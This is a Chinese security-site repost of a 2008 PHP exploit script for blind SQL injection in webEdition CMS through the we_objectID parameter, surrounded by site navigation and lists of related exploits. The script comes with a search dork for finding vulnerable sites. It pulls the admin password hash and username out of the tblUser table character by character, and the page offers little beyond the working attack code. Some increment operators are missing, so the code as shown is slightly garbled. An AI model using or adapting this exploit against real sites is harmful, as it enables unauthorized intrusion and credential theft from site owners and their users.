• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > webEdition CMS (we_objectID) Blind SQL Injection Exploit

webEdition CMS (we_objectID) Blind SQL Injection Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了webEdition CMS (we_objectID) Blind SQL Injection Exploit ,其中包含objectid,objectid是什么意思,无法获取 objectid,缺少objectid,mongodb objectid等知识点,遇到此问题的同学们可以参考下
<?php
ini_set("max_execution_time",0);
print_r('
###############################################################
#
# WebEdition CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Special Greetz to: H4x0r007 (who sent me a vulnerable Page)
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# GPM, Free-Hack, Ciphercrew, h4ck-y0u
# Date: 20.08.2008
#
###############################################################
#
# Dork: inurl:we_objectID=
# Admin Panel: [Target]/webEdition/
# Usage: php '.$argv[0].' [Target] [Userid]
# Example for http://www.site.com/en/****.php?we_objectID=21
# => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1
#
###############################################################
');
if ($argc > 1) {
$url = $argv[1];
if ($argc < 3) {
$userid = 1;
} else {
$userid = $argv[2];
}
$r = strlen(file_get_contents($url."'and 1=1/*"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."'and 1=0/*"));
$t = abs((100-($w/$r*100)));
echo "Password: ";
for ($j = 1; $j <= 32; $j ) {
for ($i = 46; $i <= 102; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select passwd from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
echo "\nUsername: ";
for ($i=1; $i <= 30; $i ) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$i.",1))!=0/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j ) {
for ($i = 46; $i <= 122; $i=$i 2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."'and ascii(substring((select username from tblUser where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
} } else {
echo "\nExploiting failed: Not enough arguments?\n";
}
?>

</div>

您可能想查找下面的文章:

  • webEdition CMS (we_objectID) Blind SQL Injection Exploit

相关文章

  • CodeDB (list.php lang) Local File Inclusion Vulnerability
  • Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit
  • Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
  • Maian Music 1.0 Insecure Cookie Handling Vulnerability
  • PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
  • BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
  • MyBulletinBoard (MyBB)
  • pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
  • fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
  • Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
    • NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
    • Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities
    • phpDatingClub (website.php page) Local File Inclusion Vulnerability
    • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
    • Rianxosencabos CMS 0.9 Remote Add Admin Exploit
    • fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
    • Belkin wireless G router ADSL2 modem Auth Bypass Exploit
    • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
    • Debian Sarge Multiple IMAP Server Denial of Service Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有